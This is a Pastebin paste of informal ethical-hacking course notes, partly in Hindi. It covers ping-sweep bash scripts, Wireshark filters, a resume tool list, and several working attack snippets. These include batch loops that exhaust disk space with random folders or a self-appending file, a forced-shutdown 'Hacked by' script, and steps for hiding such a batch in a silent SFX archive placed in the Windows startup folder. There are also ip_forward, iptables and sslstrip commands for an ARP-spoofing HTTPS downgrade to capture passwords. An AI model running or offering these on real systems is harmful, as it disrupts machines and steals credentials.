Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Shell SCripting
- ---------------
- Tool -> netdiscover
- Tool -> nmap
- Linux OS -
- Editor -> gedit | nano | leafpad | vi | vim etc
- Extension : .sh
- file name ----> scann.sh
- #/bin/bash/
- ping www.google.com
- ----exit------
- chmod 777 scann.sh
- netdiscover -> machines are runing in my network
- #/bin/bash/
- ping -c 1 172.16.3.134 |grep "64 bytes"
- ping -c 1 172.16.3.136 |grep "64 bytes"
- ping -c 1 172.16.3.137 |grep "64 bytes"
- ping -c 1 172.16.3.145 |grep "64 bytes"
- 192.168.0.23
- 192.168.0.0-192.168.0.255
- for(i = 0; i < 10;i++)
- {
- print i;
- }
- 0
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 192.168.0.12
- 192.168.0.0-192.168.0.255
- 192.168.0.1
- 192.168.0.2
- 192.168.0.3
- 192.168.0.255
- #/bin/bash/
- for ip in $(seq 1 255);do
- ping -c 1 172.16.3.$ip |grep "ttl" |cut -d " " -f4 |cut -d ":" -f1
- done
- Batch SCripting
- ----------------
- Editor -> Notepad
- Extension: .bat
- for creating randon folders
- :banao
- mkdir %random%
- goto banao
- for eating up the space in hard disk
- :space
- type chotu.txt>>chotu.txt
- goto space
- :space
- echo "hello">>chotu.txt
- goto space
- @echo off
- Random Folder
- Shutdown
- shutdown -s -t 10 -c "Hacked by Neha Mam"
- SFX ->
- 1. create a .bat file
- 2. right click on batch file
- 3. Add a archive
- 4. SFX
- 5. Advacnce tab ---> SFX Option
- 6. goto general tab ---> path
- 7. Goto update tab --> select middle option for both the items
- 8. Goto setup --> provide the path of startup
- 9. goto Modes --> select hide all.
- 10. click OK
- 11. Click ok.....
- ======================================================================
- Wireshark --> it is traffic monitoring tool.... it is not a attacking tool but traffic monitiong tool..... destination IP, source IP, PORT, PROTOCOL, Data send or received ----. It is mufat ka tool....
- It is a open souce chota sa tool which is used by all department of Indian Cyber to monitor the traffic.....
- Filters:
- --------
- For Filtering particular "source"
- 1. ip.src == 1.2.3.4
- For Filtering particular "protocol"
- 2. dns
- Using multiple Filters
- 3. dns && ip.src == 1.2.3.4
- Filtering particular Destination
- 4. ip.dst == 1.2.3.4
- Filtering Multiple Sources (Both Condition should be True)
- 5. ip.src == 1.2.3.4 && ip.src == 2.3.4.5
- Filtering Multiple Sources (Any Condition should be True)
- 6. ip.src == 1.2.3.4 || ip.src == 1.2.3.4
- Either this address in source or destination
- 7. ip.addr == 1.2.3.4
- Not Condition (Dont want to view this source)
- 8. !(ip.src == 172.16.3.137)
- Mutiple filters and both should be true as this is having &&
- 9. ip.src == 172.16.3.137 && !(ip.dst == 172.16.3.2)
- For filtering packets on basis of data it contains
- 10. tcp contains icici
- For filtering pckets contains password
- 11. http.request.method == "POST"
- double click the create sfx file.. it will be added in the startup
- ARP SPOOFING
- ------------
- Adress Resolution Protocol ---> IP Address to MAC Address
- ettercap ---> tool which is used to perform MiTM
- MiTM --> Man-in-Middle-Attcak
- HTTP --> password and user ko capture --> spoof
- HTTPS --> s--> secure --> SSL --> Secure Socket Layer---X
- >echo "1" > /proc/sys/net/ipv4/ip_forward
- >iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 ----> HTTPS --- HTTP conversion
- >sslstrip -l 8080
- ======================================
- Resume :
- Linkedin :
- Naukri:
- jobs.null.com
- Skills:
- Desktop Security
- Wireless Security
- Web Security
- Network Security
- OWASP TOP 10
- Email Security
- VAPT
- Firewall
- Application Security
- Tools Knowledge:
- ----------------
- Nmap
- netdiscover
- ettercap
- wireshark
- Aircrack
- hashcat
- metasploit
- Burpsuite
- SET
- **recuva
- ollydbg
- fluxion
- Nessus
- **Armitage
- Airodump
- Acunetix
- ***wash***
- Mod Security (WAF)
- sqlmap
- ***dirb
- havij
- ***mdk3
- zenmap | Angry ip scanner | advanced ip scanner
- Maltego
- ***wpsccan
- hping3
- OWASP ZAP (Autoated OWASP Zed Attack )
- crunch
- Aireplay
- airmon
- wifite
- reaver
- urlsnarf
- driftnet
- sslstrip
- DVWA | WAVE
- wordpress
- uniscan*
- stools
- RouterScanner
- Netsparker
- lynris
- hydra
- johntheripper
- Tools to do:
- Sparta
- Dnsenum
- dnsmap
- wafw00f -> to check wheather a website is having firewall or not
- Websploit
- Routersploit
- ===========================================
Add Comment
Please, Sign In to add comment